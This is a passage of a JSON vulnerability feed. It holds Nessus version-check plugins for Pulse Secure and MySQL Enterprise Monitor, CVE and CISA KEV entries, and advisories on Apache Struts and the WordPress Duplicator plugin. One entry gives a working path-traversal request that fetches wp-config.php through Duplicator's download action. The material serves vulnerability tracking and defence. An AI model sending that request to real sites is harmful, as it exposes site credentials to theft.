script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\", \"oracle_mysql_enterprise_monitor_local_nix_detect.nbin\", \"oracle_mysql_enterprise_monitor_local_detect.nbin\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'MySQL Enterprise Monitor');\nvar constraints = [{ 'min_version' : '8.0', 'fixed_version' : '8.0.24' }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:23:39", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to 9.1R9. It is, therefore, affected by multiple vulnerabilities:\n\n - A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction. (CVE-2020-8260)\n\n - A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary cookie injection. (CVE-2020-8261)\n\n - jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable\n __proto__ property, it could extend the native Object.prototype. (CVE-2019-11358)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-10-30T00:00:00", "type": "nessus", "title": "Pulse Connect Secure < 9.1R9 (SA44601)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-9251", "CVE-2019-11358", "CVE-2020-15352", "CVE-2020-8255", "CVE-2020-8260", "CVE-2020-8261", "CVE-2020-8262", "CVE-2020-8263"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure"], "id": "PULSE_CONNECT_SECURE-SA44601.NASL", "href": "https://www.tenable.com/plugins/nessus/142058", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142058);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2015-9251\",\n \"CVE-2019-11358\",\n \"CVE-2020-8255\",\n \"CVE-2020-8260\",\n \"CVE-2020-8261\",\n \"CVE-2020-8262\",\n \"CVE-2020-8263\",\n \"CVE-2020-15352\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0495\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/23\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Pulse Connect Secure < 9.1R9 (SA44601)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior \nto 9.1R9. It is, therefore, affected by multiple vulnerabilities:\n\n - A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated\n attacker to perform an arbitrary code execution using uncontrolled gzip extraction. (CVE-2020-8260)\n\n - A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary\n cookie injection. (CVE-2020-8261)\n\n - jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true,\n {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable\n __proto__ property, it could extend the native Object.prototype. (CVE-2019-11358)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Pulse Connect Secure version 9.1R9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8260\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pulse Secure VPN gzip RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulsesecure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nport = get_http_port(default:443, embedded:TRUE);\napp_info = vcf::pulse_connect_secure::get_app_info(app:'Pulse Connect Secure', port:port, full_version:TRUE, webapp:TRUE);\n\n# full ver from https://www-prev.pulsesecure.net/techpubs/pulse-connect-secure/pcs/9.1rx/9.1r9\nconstraints = [\n {'fixed_version':'9.1.9.9189', 'fixed_display':'9.1R9'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING,\n flags:{'xss':TRUE}\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:23:39", "description": "According to its self-reported version, the version of Pulse Policy Secure running on the remote host is prior to 9.1R9. It is, therefore, affected by the following vulnerabilities:\n\n - A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction. (CVE-2020-8260)\n\n - A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary cookie injection. (CVE-2020-8261)\n\n - jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable\n __proto__ property, it could extend the native Object.prototype. (CVE-2019-11358)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-10-30T00:00:00", "type": "nessus", "title": "Pulse Policy Secure < 9.1R9 (SA44601)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-9251", "CVE-2019-11358", "CVE-2020-15352", "CVE-2020-8255", "CVE-2020-8260", "CVE-2020-8261", "CVE-2020-8262", "CVE-2020-8263"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_policy_secure"], "id": "PULSE_POLICY_SECURE-SA44601.NASL", "href": "https://www.tenable.com/plugins/nessus/142057", "sourceData": "##\n# (c) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142057);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2015-9251\",\n \"CVE-2019-11358\",\n \"CVE-2020-8255\",\n \"CVE-2020-8260\",\n \"CVE-2020-8261\",\n \"CVE-2020-8262\",\n \"CVE-2020-8263\",\n \"CVE-2020-15352\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0495\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/23\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Pulse Policy Secure < 9.1R9 (SA44601)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Policy Secure running on the remote host is prior to\n9.1R9. It is, therefore, affected by the following vulnerabilities:\n\n - A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated\n attacker to perform an arbitrary code execution using uncontrolled gzip extraction. (CVE-2020-8260)\n\n - A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary\n cookie injection. (CVE-2020-8261)\n\n - jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true,\n {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable\n __proto__ property, it could extend the native Object.prototype. (CVE-2019-11358)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Pulse Policy Secure version 9.1R9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8260\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pulse Secure VPN gzip RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulsesecure:pulse_policy_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_policy_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Policy Secure\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'Pulse Policy Secure', port:443);\n\nconstraints = [\n {'fixed_version':'9.1R9'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING,\n flags:{'xss':TRUE}\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "wpexploit": [{"lastseen": "2021-02-15T22:04:18", "description": "The issue is being actively exploited, and allows attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before.\n", "cvss3": {}, "published": "2020-02-19T00:00:00", "type": "wpexploit", "title": "Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11738"], "modified": "2021-01-04T06:01:37", "id": "WPEX-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D", "href": "", "sourceData": "http://www.example.com/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "prion": [{"lastseen": "2023-08-16T10:15:27", "description": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-13T22:15:00", "type": "prion", "title": "CVE-2020-11738", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2022-10-05T16:54:00", "id": "PRION:CVE-2020-11738", "href": "https://kb.prio-n.com/vulnerability/CVE-2020-11738", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-16T10:15:12", "description": "An issue was discovered in Titan SpamTitan 7.07. Improper input sanitization of the parameter community on the page snmp-x.php would allow a remote attacker to inject commands into the file snmpd.conf that would allow executing commands on the target server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-17T17:15:00", "type": "prion", "title": "CVE-2020-11698", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11698"], "modified": "2022-04-28T18:33:00", "id": "PRION:CVE-2020-11698", "href": "https://kb.prio-n.com/vulnerability/CVE-2020-11698", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T04:53:48", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T16:15:00", "type": "prion", "title": "Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE.", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-07-25T18:15:00", "id": "PRION:CVE-2021-31805", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-31805", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Pulse Connect Secure contains an unspecified vulnerability that allows an authenticated attacker to perform code execution using uncontrolled gzip extraction.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Ivanti Pulse Connect Secure Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8260"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-8260", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "WordPress Snap Creek Duplicator plugin contains a file download vulnerability when an administrator creates a new copy of their site that allows an attacker to download the generated files from their Wordpress dashboard. This vulnerability affects Duplicator and Dulplicator Pro.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "WordPress Snap Creek Duplicator Plugin File Download Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-11738", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Forced Object-Graph Navigation Language (OGNL) evaluation in Apache Struts, when evaluated on raw user input in tag attributes, can lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache Struts Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-17530", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2023-07-06T15:38:35", "bounty": 0.0, "description": "CVE-2020-11738 on blog.skillfactory.ru", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-28T15:57:54", "type": "hackerone", "title": "Mail.ru: \"blog.skillfactory.ru\" Vulnerable to Directory Traversal ", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2021-04-06T12:40:10", "id": "H1:1021010", "href": "https://hackerone.com/reports/1021010", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cisa": [{"lastseen": "2021-02-24T18:06:33", "description": "The Apache Software Foundation has released a security update to address a vulnerability in Apache Struts versions 2.0.0 to 2.5.25. A remote attacker could exploit this vulnerability to take control of an affected system.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Apache Security Bulletin [S2-061](<https://cwiki.apache.org/confluence/display/WW/S2-061>) and Apache security advisory for [CVE-2020-17530](<http://mail-archives.us.apache.org/mod_mbox/www-announce/202012.mbox/%3CCAMopvkO3Bba_4GQ-%3D8jngryMSxDkzo2JbrCrCApEt1aQ4fRCQw%40mail.gmail.com%3E>) and apply the necessary update or workaround.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/12/08/apache-releases-security-update-apache-struts-2>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T00:00:00", "type": "cisa", "title": "Apache Releases Security Update for Apache Struts 2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2020-12-08T00:00:00", "id": "CISA:C17258C519A149D638B0BCF35898ABEE", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/12/08/apache-releases-security-update-apache-struts-2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:45", "description": "The Apache Software Foundation has released a security advisory to address vulnerabilities in Struts in the version range 2.0.0\u20142.5.20. An attacker could exploit one of these vulnerabilities to take control of an affected system. The current version, Struts 2.5.22, is not affected.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Apache\u2019s security advisory for [CVE-2019-0230 and CVE-2019-0233](<http://mail-archives.us.apache.org/mod_mbox/www-announce/202008.mbox/%3C66006167-999e-a1e5-4a3a-5f1c75a1e8a2%40apache.org%3E>) and upgrade to the appropriate version.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/08/14/apache-releases-security-advisory-struts-2>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-14T00:00:00", "type": "cisa", "title": "Apache Releases Security Advisory for Struts 2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-08-14T00:00:00", "id": "CISA:3D9E69A26C68866B64ED6E4B31E270E6", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/08/14/apache-releases-security-advisory-struts-2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:36:00", "description": "A remote code execution vulnerability exists in Apache Struts. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 